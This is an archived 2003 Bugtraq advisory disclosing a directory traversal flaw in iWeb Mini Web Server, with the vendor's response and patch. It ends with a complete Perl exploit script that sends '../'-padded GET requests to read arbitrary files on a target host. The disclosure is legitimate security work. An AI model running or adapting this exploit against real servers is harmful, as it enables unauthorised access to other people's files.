lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030416042708.19136.qmail@linuxmail.org>
Date: Wed, 16 Apr 2003 16:27:08 +1200
From: "subversive " <subversive@...uxmail.org>
To: bugtraq@...urityfocus.com
Subject: SFAD03-001: iWeb Mini Web Server Remote Directory Traversal



  [=================================================================]
  [...............:[  S e c u r i t y F r e a k s  ]:...............]
  [.................:[  www.securityfreaks.com  ]:..................]
  [=================================================================]




Title         : iWeb Mini Web Server Remote Directory Traversal
Risk          : Moderate - Low
Software      : iWeb Mini Web Server
Platforms     : Windows NT/XP/9x
Vendor URL    : http://www.ashleybrown.co.uk/iweb/
Discovered by : subversive <subversive@...uxmail.org>
Advisory ID   : SFAD03-001




.....:[ Overview :


The iWeb Mini Web Server is a mini web server designed for use on
Intranets and for testing websites  in  a  realistic environment.



.....:[ Details :

iWeb does not correctly filter GET requests for ../  characters
thereby allowing us to escape the webroot and  remotely traverse
the directory structure of the remote host.



.....:[ Vendor Status :

14/04/03 Initial Contact Made
15/04/03 Vendor Responded
15/04/03 Vendor Released Updated Version



.....:[ Solution :

Remove old iWeb application and download and install the updated
version which can be found at:

http://ashleybrown.co.uk/downloads/iws2.exe



.....:[ Exploit - SF-iwsuk.pl :

#!/usr/bin/perl -w
#
# S e c u r i t y F r e a k s
#   www.securityfreaks.com
#
# iWeb Mini Web Server Remote Directory Traversal
#
# subversive[at]linuxmail.org - *15/04/2003*


use IO::Socket;

if(!$ARGV[0]) {
print <<"IWEBSUK";

   S e c u r i t y F r e a k s
     www.securityfreaks.com

  -------------------------------------------------------------
  SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal
  -------------------------------------------------------------
  Usage: $0 <host> <file> <port>


IWEBSUK
exit;
}

else{
$host = $ARGV[0];
} 

if(!$ARGV[2]) {
$port = "80";
}

else {
$port = $ARGV[2];
}


my $sock = new IO::Socket::INET ( Proto => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => $port,
                                );
die "\nConnection to $host:$port failed\n" unless $sock;

print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n";
while(<$sock>) { print }
close($sock);
print("\n\n");
exit;


-- 
______________________________________________
http://www.linuxmail.org/
Now with e-mail forwarding for only US$5.95/yr

Powered by Outblaze


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ